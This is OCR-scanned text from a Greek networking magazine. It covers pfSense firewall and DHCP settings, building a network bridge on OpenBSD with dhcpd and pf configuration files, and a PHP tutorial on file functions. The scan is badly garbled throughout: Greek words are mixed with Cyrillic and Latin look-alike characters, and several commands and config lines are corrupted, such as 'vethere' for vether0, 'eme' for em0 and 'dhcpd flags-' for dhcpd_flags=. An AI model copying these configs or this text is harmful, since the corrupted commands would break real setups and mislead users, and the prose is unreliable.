When set, this option blocks traffic from IP addresses that are reserved for private networks as per RFC 1918 
(10/8, 172. 16/12, 192. 168/16) as well as loopback addresses (127/8). You should generally leave this option 
turned on, unless your WAN network lies in such a private address space, too. 


Block bogon networks 

When set, this option blocks traffic from IP addresses that are reserved (but not RFC 1918) or not yet assigned by 
IANA. Bogons are prefixes that should never appear in the Internet routing table, and obviously should not appear 
as the source address in any packets you receive. 


Note: The update frequency can be changed under System->Advanced Firewall/NAT settings. 
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* Interfaces 


Status ^ Diagnostics > Help 


Services: DHCP server б egoo 


mo N a 
[V] 


[C] Deny unknown clients 
If this is checked, only the dients defined below will get DHCP leases from this server. 


Enable DHCP server on OPT3 interface 


Subnet 192.168.80.0 
Subnet mask 255.255.255.0 
Available range 192. 168.80. 1 - 192. 168.80.254 


SSO Ν 192.168.80.100 to Ν 192.168.80.150 
3 5 insi i outside the above Range, they may be specified here. 


© E 


> System » Interfaces 


> Status > Diagnostics 


Interfaces Interface IPs used by the DNS Forwarder for responding to queries from clients. If an interface has both 


IPv4 and IPv6 IPs, both are used. Queries to other interface IPs not selected below are discarded. The 
default behavior is to respond to queries on every available IPv4 and IPv6 address. 


All ^ 
WAN 

WAN IPv6 Link-Local 
LAN 

LAN IPv6 Link-Local 
OPT1 

OPT1 IPv6 Link-Local 
OPT2 

OPT2 IPv6 Link-Local 


Localhost 


У! Strict Interface Binding 
If this option is set, the DNS forwarder will only bind to the interfaces containing the IP addresses selected 
above, rather than binding to all interfaces and discarding queries to other addresses. 


NOTE: This option does NOT work with IPv6. If set, dnsmasq will not bind to IPv6 addresses. 


(8) - Show advanced option 
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Firewall: Rules: Edit 2008 


Action Pass ν 

Choose what to do with packets that match the criteria specified below. 

Hint: the difference between block and reject is that with reject, a packet (TCP RST or ICMP port unreachable for UDP) is 
returned to the sender, whereas with block the packet is dropped silently. In either case, the original packet is discarded. 


E Disable this rule 
Set this option to disable this rule without removing it from the list. 


Interface ОРТЗ = —_— 


Choose on which interface packets must come in to match this rule. 


TCP/IP Version IPv4 ~ Select the Internet Protocol version this rule applies to «fes 


any Y 
Choose which IP protocol this rule should match. 
Hint: in most cases, you should specify ΤΟΡ here. 


Source ^] not 
Use this option to invert the sense of the match. 
Туре: — OPT3subnet = d 
Address: 11127 + 
Destination ^] not 
Use this option to invert the sense of the match. 
Туре: апу ES A 
Address: 11127 ~ 
Log ~] Log packets that are handled by this rule 


Hint: the firewall has limited local log space. Don't turn on logging for everything. If you want to do a lot of logging, 
consider using а remote syslog server (see the Diagnostics: System logs: Settings раде). 


Description R Default "allow OPT3 to any" rule 


You may enter a description here for your reference. 


Firewall: Rules: Edit E To 9) Ὁ 


Edit all rule 


Action Pas ν 
Choose what to do with packets that match the criteria specified below. 
Hint: the difference between block and reject is that with reject, a packet (TCP RST or ICMP port unreachable for UDP) is 
returned to the sender, whereas with block the packet is dropped silently. In either case, the original packet is discarded. 


Disabled F] Disable this rule 
Set this option to disable this rule without removing it from the list. 


Interface LAN = 4 


Choose on which interface packets must come in to match this rule. 
TCP/IP Version IPv4 ~ Select the Internet Protocol version this rule applies to а= 


Protocol any - 
Choose which IP protocol this rule should match. 
Hint: in most cases, you should specify ΤΟΡ here. 


Source A not 
Use this option to invert the sense of the match. 
Type: any = Со 
Address: a7 


Destination F) not 
Use this option to invert the sense of the match. 


"es [ax - «----------- 
Address: / | 127 | + 
Log “| Log packets that are handled by this rule 


Hint: the firewall has limited local log space. Don't turn on logging for everything. If you want to do a lot of logging, 
consider using a remote syslog server (see the Diagnostics: System logs: Settings page). 


ο E ——— —— 


You may enter a description here for your reference. 
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Firewall: Rules 2920 
(Foating | мал es oPr2 | ом | tare von | плес | 


[a Пруд“ |= . d re 


a 
κε 


2" LAN ΟΡΤΙ, 0912: 
ἴδιοι κανόνες! 


pfSense is © 2004 - 2013 by Electric Sheep Fencing LLG erved. [view license 


Βήμα 9. MetaBaivoupe στους κανόνες rou firewall που αφορούν στο LAN interface, δίνοντας Firewall ^ 
Rules > LAN. Παρατηρήστε έναν kavóva nou ἐχει προσθέσει αυτόματα ro pfSense: Τα пакета IPv4 nou 
ξεκινούν απ’ όλα ra μηχανήματα ra οποία εἶναι συνδεδεμένα στο LAN port, περνάνε ελεύθερα όπου κι 
av πηγαίνουν. Θέλουμε ἑναν παρόμοιο κανόνα για то OPT3. Προκειμένου να προσθέσουμε νέο κανόνα 
για συγκεκριμένο network interface, πηγαίνουμε στην αντίστοιχη картела --εν προκειμένω στην ОРТЗ— 
και κάνουμε κλικ στο κουμπάκι [+]. Δείτε το screenshot yia ro ОРТЗ και προσθέστε κι εσείς ἑναν ἰδιο 
κανόνα. Αλλά δεν τελειώσαμε. Πηγαίνουμε τώρα вама στην картела µε τους κανόνες Tou LAN. Δίπλα 

ап' αυτὀν που μόλις παρατηρήσαμε, πριν φτιάξουμε τον κανόνα για то ОРТЗ, κάνουμε κλικ ото [e]. 
Μπορούμε τώρα va τον τροποποιήσουµε kai TO μόνο που αλλάζουμε εἰναι την τιµή ToU Source, ώστε апо 
LAN subnet να γίνει any. Enikup@voupe την αλλαγή και προσθέτουμε апо Evav ἰδιο ακριβώς κανόνα στα 
OPT1 και ОРТ2. 

Σημεϊωση. Έτσι όπως фтагаџг τους κανόνες yia та LAN, OPT1 ка! ОРТ2, κάθε πελάτης Tou router είναι 
δυνατὀν va επικοινωνεί µε οποιονδήποτε dAAov πελάτη, ανεξαρτήτως σε nio port εἶναι συνδεδεμένος 
(απευθείας ἡ µέσω switch). Αν επιθυμούσαμε να µην εἰναι εξ ορισμού δυνατή η επικοινωνία των µηχανη- 
μάτων που καταλήγουν σε διαφορετικά ports rou router, τότε θα αφήναμε τον κανόνα για то LAN ως εἶχε 
και θα τον επαναλαμβάναμε για та ΟΡΤΙ και ОРТ2. 


Βήμα 10. Αν όλα έχουν πάει кала, τότε ὁλοι οι πελάτες rou pfSense, σε ὀποιο port ki αν συνδέονται 
EKTOG ano εκείνο του WAN, θα παίρνουν διεύθυνση της µορφής 192.168.80.х. О router τους θα εἰναι o 
192.168.80.1, то ἰδιο ΚΙ о nameserver Τους. Φυσικά, θα μπορούν να επικοινωνούν μεταξύ τους, ενώ θα 
βγαίνουν και στο Internet. Κάντε τις δοκιμές σας µε Eva ἡ περισσότερα VMs πίσω апо το pfSense, та 
οποία θα έχουν δικτύωση τύπου host-only — αλλά για κἀποιο ano τα τρία host-only networks που opi- 
ζουν οι αντίστοιχοι adapters rou VirtualBox. (AUTO το τελευταίο εἶναι για να εξομοιώσουμµε την περίπτω- 
ση φυσικού router, ὁπου Οἱ πελάτες του συνδέονται σε καθένα апо ra Ethernet ports που ανήκουν στο 


ίδιο bridge group.) 


Παρατηρήστε, τέλος, от! ενώ στα OPT1 και OPT2 interfaces δεν αποδὠσαμε διευ- 
θύνσεις IP, στο LAN interface του pfSense афпоаџе τη διεύθυνση IP nou поп εἰχε. 
AUTÒ το κάναμε για λόγους εὐκολης διαχεἰρισης: Μέσω του LAN port εἰμασταν ouv- 
δεδεμένοι στο web panel του pfSense, και δουλεύαμε. Ωστόσο, γενικἀ κάτι τέτοιο 
δεν εἶναι anapairnro. Κάλλιστα, δηλαδή, ёха bridge interface џпорг! va γεφυρώνει 
(емеруа) network interfaces που στερούνται διευθύνσεων IP. ‘Eva τέτοιο σενάριο θα 
δούμε και στη συνέχεια, ὀπου δουλεύουμε µε TO OpenBSD. 
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Bridging µε To OpenBSD 


Μια εναλλακτικἠ Tou pfSense πρὀταση yia том DIY router oac, αποτελεἰ то OpenBSD. 
Δεν θα птам υπερβολή av λέγαμε ὁτι το εν λόγω λειτουργικὀ εἶναι συνώνυμο της 
ασφάλειας — και σίγουρα εἶναι πολύ, ра пара πολύ, ελαφρύτερο апо το pfSense. 
Αν ἑως опџера δεν ixate την ευκαιρἰα να παἰξετε µε то OpenBSD, γνωρίζοντας τι 
θ' ανακαλύψετε σχεδόν σας ζηλεύουμε! Ξεκινήστε την ενασχὀλησή σας µε то 100 
επεισόδιο της Ίης σεζὀν του deltaCast: 


http: //deltahacker.gr/deltacast-s01e10 


Н αναλυτικἠ επἰδειξη της δημιουργίας bridge oro OpenBSD nou ακολουθεί, γίνεται 
στο πλαίσιο εικονικού δικτύου εντὸς του οποίου έχουμε NON Eva VirtualBox VM µε 
OpenBSD, σε ρόλο router (βλ. το deltaCast 501610). Το εν Aóyo VM ἐχει τέσσερις 
network adapters. 


Adapter 1. Εἶναι τύπου bridged kal γεφυρωμένος апо ro VirtualBox µε την αληθινἠ 
карта δικτύου rou host computer — συγκεκριµένα μ' αυτή που συνδέεται στο αλη- 
θινὀ modem/router Tou τοπικού δικτύου. О Адарег 1 έχει το ρόλο του WAN interface 
και για το OpenBSD eivai то ето. 


Adapter 2, Adapter 3 8 Adapter 4. Όλοι τους εἶναι τύπου host-only, ανήκουν σε 
τρία διαφορετικἁ host-only networks του VirtualBox και εἶναι σε Promiscuous Mode. 
Έχουν και та τρία ρόλο LAN adapter και yia το OpenBSD εἰναι τα emi, em2 και em3 
αντίστοιχα. 


To bridge interface nou θα δημιουργήσουμε σε πολὺ Муо θα γεφυρώνει τα emi, 
em2 kai em3. Αυτή τη фора κανένα εκ των ет1, em2, em3 δεν θα 'χει διεύθυνση 
IP: Τα μηχανήματα nico ano τον router θα βλέπουν µόνο τη διεύθυνση rou bridge 
interface. Ακριβώς γι’ αυτό δουλεύουμε топіка, ano την κονσόλα rou OpenBSD VM 
και φυσικὰ μέσα апо rov λογαριασμὀ Tou root. 


Βήμα 1. Ρυθµἰζουμε τα emi, em2, em3 ώστε va εἶναι ενεργά -- αλλά χωρίς va 
έχουν διευθύνσεις IP: 


# echo up > /etc/hostname.em1 
# echo up > /etc/hostname.em2 
# echo up > /etc/hostname.em3 


Ρυθµίζουµε To network interface της γέφυρας (vetherO), дмомтас rou ша катал- 
ληλη, non-routable διεύθυνση IP. Еџејс, π.χ., επιλέξαμε va TOU αντιστοιχίσουµε τη 
διεύθυνση 192.168.90.1, αφού οὐτε το αληθινό αλλά οὐτε και κἄποιο апо Ta host- 
only networks rou VirtualBox δεν птам ro 192.168.90.0/24. 


# echo "inet 192.168.90.1 255.255.255.0" > /etc/hostname.vethero 


Па τη ρύθμιση της ἰδιας της γέφυρας δημιουργούμε, N.X., µε TO nano, το νέο αρχείο 
ονόματι /etc/hostname.bridgeO: 


# nano /etc/hostname.bridgeO 

Tou NPOOBETOUHE τις ακόλουθες γραμμὲς: 
add vether@ 
add emi 
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add em2 

add em3 
blocknonip em1 
blocknonip em2 
blocknonip em3 
up 


Τις αλλαγές στο αρχείο τις γράφουμε µε [CTRL+O] και [Enter], ενώ ro nano то 
εγκαταλεἰπουµε µε [CTRL+X]. Πριν ενεργοποιἠσουµε τη γέφυρα, ας κάνουμε και TIG 
απαραίτητες τροποποιήσεις στις ρυθμίσεις που αφορούν στον DHCP server, καθώς 
και στο pf. Ανοίγουμε κατ' αρχάς το αρχείο /etc/rc.conf.local: 


# nano /etc/rc.conf.local 


Αν έχουμε ακολουθήσει τις οδηγἰες Tou deltaCast 501е10, θα δούμε την ακόλουθη 
γραμμὴ: 


dhcpd flags-"eme" 
Την αλλάζουμε ὥστε ма εἶναι ακριβώς ὁπως η ακόλουθη: 
dhcpd flags-"vethere" 


Οφείἰλουμε βεβαίως va φροντίσουμε και том ἰδιο том DHCP server. Дејте το δικὀ 
μας αρχείο родшовом kai rpononoirjore αναλόγως ro δικὀ σας (μιλάμε για то /etc/ 
dhcpd.conf): 


option domain-name "parabing.net"; 


option domain-name-servers 8.8.8.8, 8.8.4.4; 


subnet 192.168.90.0 netmask 255.255.255.0 ( 
option routers 192.168.90.1; 
range 192.168.90.100 192.168.90.150; 

} 


Μένει, τέλος, να κάνουμε τις απαραἰτητες τροποποιήσεις kai στο NON υπάρχον /etc/ 
pf.conf. Ιδού ro δικὀ µας, µετά апо олес TIG αλλαγές: 


wan_if="eme" 
int_if="vether@ ет1 em2 em3" 


allowed icmp types-"echoreq" 


allowed tcp service ports-"( 22 }" 


set block-policy drop 
set loginterface $wan if 


set skip on lo 
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N99 73300: 


match out on $wan if inet from !($wan if:network) to any nat-to ($wan_ 
if:0) 


block in log 


pass out quick 
antispoof quick for ( lo $wan if ) 


pass in on $wan if inet proto tcp from any to ($wan if) port $allowed 
tcp service ports 


pass in inet proto icmp all icmp-type $allowed icmp types 


pass in on { $int if } 


(Mnopeite αν θέλετε va το κατεβάσετε апо ro http://bit.ly/dh027pfconf.) О урпуо- 
ρότερος τρόπος yia να гфарџовоџџе *OAEC* τις αλλαγές εἶναι µε µια επανεκκίνηση: 


# reboot 


Аџто ἠταν. Av όλα xouv nde! кала, каве ΝΜ-πελάτης Tou OpenBSD, ανεξαρτήτως 
TOU (εικονικού) port στο οποίο εἶναι συνδεδεμένος, θα έχει διεύθυνση IP апо то 
еџрос 192.168.90.100-192.168.90.150, ενώ yia nameservers θα Χρησιμοποιεί τους 
8.8.8.8, 8.8.4.4 (της Google). Όλοι οι πελάτες θα επικοινωνούν μεταξύ τους, θα 
βγαίνουν στο Internet µέσω rou OpenBSD VM και θα προστατεύονται ano то pf. 


Και πριν σας αφήσουμε να παρακολουθήσετε µια επἰδειξη επίθεσης MiTM που στηρἰ- 
ζεται στο wireless bridging (βλ. άρθρο σελ. 64), ша μόνο ερὠτηση θα σας κάνουμε: 
Ἐχετε αποφασίσει nio Soekris board θ' αγοράσετε ἡ μήπως το µελετάτε ακόμα; :Р 
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To deltaHacker είναι το ένα και μοναδικό 
περιοδικό µε θεματολογία то ethical 
hacking, τα δίκτυα και την ασφάλεια, τον 
προγραμματισμό και τα ηλεκτρονικά. 


Το deltaHacker δεν γυρνάει εδώ κι εκεί στα 
περίπτερα, αλλά για δεύτερη χρονιά στη σειρά 
έρχεται κατευθείαν σ' εσάς. 


Αν είστε από εκείνους που δεν βλέπουν τον 
υπολογιστή τους ως άλλη µια οικιακή συσκευή 
και δεν αντιμετωπίζετε το Internet ως ένα 
δίκτυο που αρχίζει και τελειώνει µε το Facebook 
και то Twitter, τότε είναι 109% βέβαιο ότι θα 
αγαπήσετε το deltaHacker, καθώς κι ότι θα 
θέλετε την παρέα του κάθε μήνα. 


Παραγγείλετε τώρα µία από τις συµφέρουσες 
συνδρομές από то 
http://deltahacker.gr/pdf12order 
(ηλεκτρονική έκδοση) 

ή από το 

http://deltahacker.gr/order 

(έντυπη έκδοση, έως το τεύχος 019) 


Σηµείωση: Την ύλη όλων των τευχών που 
έχουν κυκλοφορήσει ως τώρα µπορείτε να τη 
βλέπετε στο 


deltahacker.gr/category/magazine-issues 


' Skill: Intermediate 
Tags: LAMP, PHP, fopen, fclose, fwrite, fread, frewind, fseek, feof 


Web development σε περιβάλλον LAMP [μέρος 4] 


Έχοντας εξετάσει kai την αντικειµενοστρεφή πλευρά της РНР, 
ξεμπερδέψαμε µε Eva μεγάλο μέρος της θεωρητικἠς γνωριμίας µε τη 
γλὠσσα. Και μιλάμε για θεωρητικἠ γνωριμία, διότι η ουσιαστική γνώση 
προὐποθέτει και την πρακτική ενασχόληση. Σε αυτό το μέρος της σειράς 
Hac θα αρχίσουμε ма αποκτάµε nio OTEPEN γνώση, χτίζοντας (επιτέλους) 
την πρώτη µας δικτυακἠ εφαρµογή! 
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Πριν ξεκινήσουμε πρέπει va ξεκαθαρἰσουµε τι εννοούμε ὁταν λέμε OT! θα φτιάξουμε 
µια δικτυακἠ εφαρμογή. Ема! γεγονός ὁτι HE τις γνώσεις που £XOU[IE αποκτήσει ως 
тора μπορούμε να γράψουμε αρκετά μεγάλα, σύνθετα και εντυπωσιακά проуран- 
рата. Н διαδικασία εκμάθησης, όμως, απαιτεἰ σύνεση. Στο еппедо που βρισκόµα- 
στε, η μελέτη µιας τεράστιας εφαρμογἠς δεν θα προσέφερε τίποτα ουσιαστικὀ. Αν 
για παράδειγµα εξετάζαµε тп δομὴ και τη λειτουργία ενός ολόκληρου CMS, θα σας 
Φλομώναμε στη θεωρία και, στο τέλος, OX! μόνο δεν θα εἰχατε μάθει κἀτι χρήσιμο, 
αλλά θα εἶχατε коџраоте! κι ενδεχομένως απογοητευτεἰ. AUTO που πρέπει ма µελε- 
τήσουμε εἶναι ша μικρἠ εφαρµογή, η οποία θα αλληλεπιδρά µε то χρήστη, θα џпоре! 
να αποθηκεύει δεδομένα για μελλοντική χρήση και, τέλος πάντων, θα πραγματοποιεί 
μια κἄποια εργασία. Н εφαρμογἠ που επιλέξαμε να παρουσιάσουμε εἶναι Eva βιβλίο 
επισκεπτὠν (GuestBook), το οποίο θα επιτρέπει στους χρήστες να καταχωρούν τα 
μηνύματά τους, ενώ θα προβάλλει και та ἤδη αποθηκευμένα. 


Βασικός χειρισμός αρχείων 


Για την αποθήκευση, την ανάκτηση και γενικότερα τη διαχείριση δεδομένων, οι Bå- 
σεις δεδομένων αποτελούν την καλύτερη δυνατὴ επιλογἠ. Δεν σκοπεύουμε va ασχο- 
ληθούμε σ' αυτό το ἆρθρο µε την MySQL, τη βάση δεδομένων του πακέτου LAMP. 
Θα προτιµήσουμε την пала, απλοϊκή και σίγουρη λύση της αποθήκευσης σε αρχεία. 
Εξάλλου, пара τις ευκολίες που προσφέρουν οι βάσεις δεδομένων, η χρησιμότητα 
των αρχείων παραμένει μεγάλη. Επομένως, μαθαίνοντας РНР ἐχει αξία va γνωρἰσου- 
HE олес τις λειτουργίες που σχετἰζονται µε το χειρισμό των αρχείων. 


Για την ανάγνωση емос αρχείου ἡ την εγγραφἠ δεδομένων σ' аџто, πρέπει прота ма 
το ανοίξουμε. AUTO γίνεται µε τη συνάρτηση fopen, στην οποία δηλώνουμε τη δια- 
Opoun του αρχείου και την κατάσταση στην οποία θέλουμε να το θέσουμε. Ως ката- 
σταση νοεῖται ο τρόπος HE τον onoio θέλουμε να εργαστούμε (ανάγνωση, єүүрафц, 
ανάγνωση κι εγγραφἠ κ.λπ.) Ас δούµε τη σύνταξη της fopen: 
фер = fopen('path/to/file', ‘r+') ; 

Όταν εκτελεἰται η συνάρτηση fopen, επιστρέφει гмам поро (resource). Με απλά Àb- 
για, επιστρέφει ἑναν δείκτη, µέσω του οποίου μπορούμε va χειριστούμε το αρχείο. 
Н δεύτερη παράμετρος δηλώνει τον τρόπο εργασίας eni του αρχείου και µπορεί va 
πάρει μόνο ша апо τις τιμὲς που περιλαμβάνει ο ακόλουθος πίνακας: 


Ανάγνωση 
Ανάγνωση και εγγραφή 


Εγγραφή. Αν υπάρχει το αρχείο, τα περιεχόμενά του θα επικαλυφθούν. 


Ανάγνωση και εγγραφή. Αν υπάρχει το αρχείο, τα περιεχόμενά του θα επικαλυφθούν. 


Ασφαλής εγγραφή. Αν υπάρχει το αρχείο, δεν θα ανοιχτεῖ. 


Ανάγνωση και εγγραφή και ανάγνωση. Αν υπάρχει το αρχεῖο, δεν ба ανοιχτεί. 


a Εγγραφή µε προσάρτηση δεδοµένων στο τέλος του αρχείου (append). 


a+ ! Ανάγνωση και εγγραφή, µε προσάρτηση των δεδοµένων στο τέλος του αρχείου (append). 


Πριν προχωρήσουμε, σημειώστε ὁτι αφού ανοἰξουµε Eva αρχείο και отам ολοκληρώ- 
coupe την εργασία µας, πρέπει και να το κλείσουμε. Н συνάρτηση nou χρησιµοποι- 
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OUHE για το κλείσιμο ενός ανοιχτού αρχείου εἶναι n fclose. Σε αυτήν δίνουμε σαν na- 
ράμετρο rov πόρο nou εἰχαμε λάβει апо την fopen. Н σὐνταξή της εἶναι απλούστατη: 


fclose($fp) ; 


Н συνάρτηση επιστρέφει true ам το κλείσιμο του αρχείου ολοκληρώθηκε µε επιτυ- 
xia, ἡ false av προέκυψε κάποιο σφάλμα. 


Εγγραφή δεδομένων 


Па να γράψουμε o' Eva αρχείο χρειαζόμαστε κατ' αρχάς Tov αντίστοιχο поро, τον 
οποίο λαμβάνουμε εκτελώντας την fopen. Στη συνέχεια, αρκεί va καλέσουµε τη OU- 
νάρτηση fwrite. Αυτή δέχεται ως παραμέτρους rov поро του αρχείου, καθὼς και ша 
μεταβλητή τύπου string µε τα προς εγγραφή δεδομένα. Προαιρετικἀ μπορούμε va 
δώσουμε και ша τρίτη παράμετρο, που δηλώνει το μήκος του string ue ra δεδομένα!: 


fwrite($fp, $string [,$length]) ; 


Н συνάρτηση fwrite επιστρέφει Evav ακἐραιο αριθμὀ, nou αναπαριστά το πλῆθος 
των bytes που γράφτηκαν στο αρχείο. Στην περίπτωση nou η εγγραφἠ αποτύχει, η 
fwrite επιστρέφει την τιµή False. 


Αντίστοιχη µε την fwrite (av και πιο εὐχρηστη) εἶναι η file put. contents. Αυτή η συ- 
νάρτηση αυτοματοποιεί ὁλη τη διαδικασἰα και συγκεκριµένα εκτελεί τις ακόλουθες 
εργασίες: Ανοἰγει το αρχείο που δηλώνουμε, γράφει τα επιθυμητά δεδομένα και στη 
συνέχεια κλείνει το αρχείο. Н file put contents δέχεται ως παραμέτρους τη διαδρο- 
μή προς το αρχείο ка: τα δεδομένα που θέλουμε να γράψουμε (eire στη μορφὴ µιας 
μεταβλητής string eire σε ἑναν πἰνακα). Προαιρετικἀ μπορούμε να δώσουμε και KÅ- 
ποια flags, που ενεργοποιούν πρὀσθετες λειτουργἰες. Παρακάτω φαίνεται η σύνταξη 
της συνάρτησης καθὼς κι гмас πἰνακας µε ra διαθέσιµα flags: 


file_put_contents($filepath, $string [,flags]) ; 


Αναζητά to αρχεῖο στους καταλόγους που περιλαμβάνει 


FILE USE INCLUDE PATH ; ; И j um 
== Е το δοσμένο path, µέσα στο αρχεῖο ρυθμίσεων php.ini. 


Αν το αρχείο υπάρχει ήδη, προσαρτά τα δεδοµένα στο 


FILE APPEND j ђ 5 
— τέλος αυτού και SEV та επικαλύπτει. 


LOCK_EX Κλειδώνει το αρχείο yia αποκλειστική χρήση. 


Ανάγνωση δεδοµένων 


Па να διαβάσουμε τα περιεχόμενα ενὸς αρχείου, ἐχουμε περισσότερες επιλογἑς. Н 
nio απλἠ μέθοδος εἶναι να χρησιμοποιήσουμε τη συνάρτηση file get contents. Н 
εν λόγω συνάρτηση, σε αντιστοιχία µε την file_put_contents, ανοίγει το αρχείο, 
διαβάζει τα δεδομένα και το κλείνει αυτόματα. Н μόνη παράμετρος nou απαιτεἰ η ou- 
νάρτηση file get contents εἶναι η дладроџћ και то ὀνομα του επιθυμητού αρχείου: 


file get contents($filepath) ; 


Όταν ολοκληρωθεί η ανάγνωση, η συνάρτηση επιστρέφει Eva string µε та περιεχὀ- 
џема του αρχείου. Μια παρόμοια συνάρτηση εἶναι η file, που επιστρέφει τα δεδομὲ- 
να rou δοσμένου αρχείου σε емам пмака. Συγκεκριμένα, каде στοιχείο αυτού του 


1. Αν το μήκος που δώσουμε εἶναι µεγαλύτερο апо ro μήκος της μεταβλητής µε τα δεδοµένα, η fwrite θα σταματήσει όταν φτάσει στο τέλος 
της μεταβλητής 
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nivaka εἶναι ша џетабАптћ string και περιλαμβάνει ro δεδοµένα µιας γραμμής του 
αρχείου: 


file($filepath) ; 


Υπάρχουν περιπτώσεις ката τις опојес δεν θέλουμε να διαβάσουμε Eva ολόκληρο 
αρχείο (π.χ., γιατὶ εἶναι πολύ μεγάλο). Τότε βολεύει να διαβάσουμε τα περιεχόμενα 
του αρχείου γραμμὴ προς γραμμή. Κάτι τέτοιο επιτυγχάνεται µε τη συνάρτηση fgets, 
στην οποία δίνουμε σαν παράμετρο το επιθυμητό αρχείο. Προαιρετικἀ, μπορούμε 
va δηλώσουμε και το πλήθος των χαρακτήρων που θέλουμε να διαβάσει апо την 
εκάστοτε γραμμή. Πάντως, αν δεν ορἰσουµε την προαιρετικἠ παράμετρο, η fgets 
επιστρέφει ολόκληρη την τρέχουσα γραμμή: 


$line string = fgets($fp [,length]) ; 


Τώρα, βέβαια, θα αναρωτιἑστε noc μπορούμε ма διαβάσουμε τη δεύτερη γραμμὴ rou 
αρχείου, την τρίτη kai πάει λέγοντας. Па να διαβάσουμε την επὀµενη γραμμή, apkei 
να ξανακαλέσουµε τη συνάρτηση fgets! Па να µην προκύψει оџос капою σφάλμα, 
θα πρέπει µε κἄποιον τρόπο να γνωρίζουμε от! δεν έχουμε φτάσει στο τέλος TOU ap- 
χείου. AUTO μπορούμε ма то μάθουμε апо τη συνάρτηση feof. Н εν λόγω συνάρτηση 
δέχεται WC παράμετρο vav поро αρχείου και επιστρέφει true av ο δείκτης θέσης 
του αρχείου ἐχει φτάσει στο τέλος. Το παρακάτω απόσπασμα κὠδικα εμφανίζει та 
περιεχόμενα ενὸς αρχείου γραμμή προς γραμμὴ, φροντἱζοντας να τις απαριθµἠήσει: 


while(!feof($fp)){ 
$line = fgets($fp) ; 
$i++ ; 

echo "Line $i : $line\n" ; 


} 
Μια πιο εξεζητημένη napaAAayr| rnc fgets апотеле! η fgetss. Αυτή η συνάρτηση επι- 
στρέφει τα περιεχόμενα rou αρχείου γραμμή προς γραμμὴ, αφού αφαιρέσει ὀλεςτις 
ετικέτες (tags) HTML, καθώς και тихом χαρακτήρες NULL. Н fgets δέχεται σαν пара- 
μετρο ro ὀνομα ενὸς αρχείου και δύο προαιρετικές παραμέτρους. Н πρώτη орке! то 
πλήθος των χαρακτήρων nou θα επιστραφούν, evo η δεύτερη δηλώνει τις ετικέτες 
(tags) nou θα αγνοηθούν και Хдемх θα αφαιρεθούν. 


Μερικὲς φορὲς, η φύση της εργασίας µας καθιστά την ανάγνωση ката γραμμὴ εντε- 
Мос ασύμφορη και µπελαλίδικη. Σε αυτές τις περιπτώσεις, βολεύει να διαβάζουμε 
το αρχείο χαρακτήρα προς χαρακτήρα. Κάτι τέτοιο γίνεται εύκολα µε τη συνάρτηση 
fgetc, η οποία δέχεται σαν παράμετρο гмам поро αρχείου και επιστρἑφει ἑναν μόλις 
χαρακτήρα. Αν την καλέσουµε εκ νέου, επιστρέφει τον αµέσως επόμενο χαρακτήρα 
και αυξάνει ката va byte τον «δείκτη θέσης». Πα να ελέγξουμε αν έχουμε φτάσει 
στο τέλος TOU αρχείου, μπορούμε και пал να χρησιμοποιήσουμε τη συνάρτηση feof. 
Το απὀσπασμα που ακολουθεἰ διαβάζει κἄποιο αρχείο χαρακτήρα προς χαρακτήρα, 
αντικαθιστά τις τελείες µε κὀμματα και το αντἰστροφο: 


while(!feof($fp)){ 
$char = fgetc($fp) ; 
if ($char == '.') 
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echo ',' ; 

elseif ($char == ',') 
echo '.' ; 

else 


echo $char ; 


} 


Па το τέλος αφήσαμε τη συνάρτηση fread, η οποία επιτρέπει να διαβάζουμε όσους 
χαρακτήρες επιθυμούμε, ξεκινώντας апо την τρέχουσα θέση (αυτήν που υπαγορεύει 
о «δεἰκτης θέσης»). Νομίζουμε от! οι δύο παράμετροι που δέχεται η συνάρτηση εἶναι 
αυτονόητες: 


fread($fp, $length) ; 


Н оџукекршемп συνάρτηση συνδυάζεται συνήθως HE ric rewind και fseek. Ac pi&ou- 
µε ша ματιὰ και σ' αυτές: 


rewind($fp) ; 


Н rewind δέχεται oc παράμετρο Evav поро αρχείου και μηδενἰζει τον αντἰστοιχο 
«δείκτη θέσης», ὥστε η επὀµενη εργασία ανάγνωσης να ξεκινήσει апо την αρχή. 


fseek($fp, $offset [,$whence]) ; 


Н fseek δέχεται ως παράμετρο rov nópo ενὸς αρχείου και αυξάνει τον «δείκτη της 
θέσης» ката τόσα bytes, ова δηλώνει η παράμετρος offset. Н τελευταία параџе- 
трос εἶναι προαιρετικἠ και µπορεί va δεχτεἰ μόνο ша апо τις ακόλουθες τρεις τιμές: 
SEEK_CUR, 5ΕΕΚ 5ΕΤ και SEEK_END. Στην πρώτη περίπτωση η συνάρτηση па- 
ρουσιἀζει τη καθιερωμένη συμπεριφορά (αυτήν nou περιγράψαμε παραπάνω), evo 
στη δεύτερη περίπτωση, ο «δείκτης θέσης» παΐρνει την τιµή της παραμέτρου offset. 
Στην τρίτη περίπτωση, ο «δείκτης θέσης» παραπέμπει σε ша θέση του αρχείου, που 
απέχει τόσα bytes апо το τέλος, ова δηλώνει η παράμετρος offset. Αυτή η λειτουρ- 
yia рпорєі να μοιάζει παράξενη, αλλά orav θα σας χρειαστεἰ (και να εἶστε σίγουροι 
оті κάποια στιγμή θα σας χρειαστεί) θα την θυμηθείτε και θα χαρείτε yia την ὑπαρξὴ 
TNG. 


Φάκελοι και Aoinoi ἐλεγχοι 


Δουλεύοντας µε αρχεία, εἶναι βέβαιο OT! κἄποια στιγμὴ θα χρειαστεί να ελέγξουμε 
για την ὑπαρξη κάποιου. Σε αυτή τη δουλειά βοηθά η συνάρτηση file exists, που 
δέχεται σαν µοναδικἠ παράμετρο τη θέση και το ὀνομα ενὸς αρχείου. Αν το αρχείο 
υπάρχει, η συνάρτηση επιστρέφει true, διαφορετικἁ επιστρέφει false. Ας δούμε κι 
ἑνα απλὀ παράδειγµα: 

echo "Το αρχείο $filepath " ; 

echo file exists($filepath)? "υπάρχει" : "δεν υπάρχει" ; 
Па να μάθουμε το μέγεθος ενὀὸς αρχείου σε bytes, μπορούμε va καλέσουµε τη συ- 
νάρτηση filesize. Το παρακάτω παράδειγµα χρήσης μιλάει апо μόνο Tou: 

echo "Το αρχείο $filepath , έχει μέγεθος" .filesize($filepath) ; 
Ορισμένες φορὲς ба χρειαστεἰ να αντιγράψουμε, va длаурафоџџе ἡ απλά ма pE- 
τονοµάσουµε Eva αρχείο. Н PHP προσφέρει ἑτοιμες συναρτήσεις και για аџтес τις 
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epyaoiec. Πρόκειται yia τις copy, unlink και rename, avriororya: 
copy($source, $destination) 
unlink($filepath) ; 
rename($origin, $target) ; 


Н ερµηνεἰα των παραμέτρων nou δέχεται κάθε συνάρτηση εἶναι μάλλον προφανἠς 
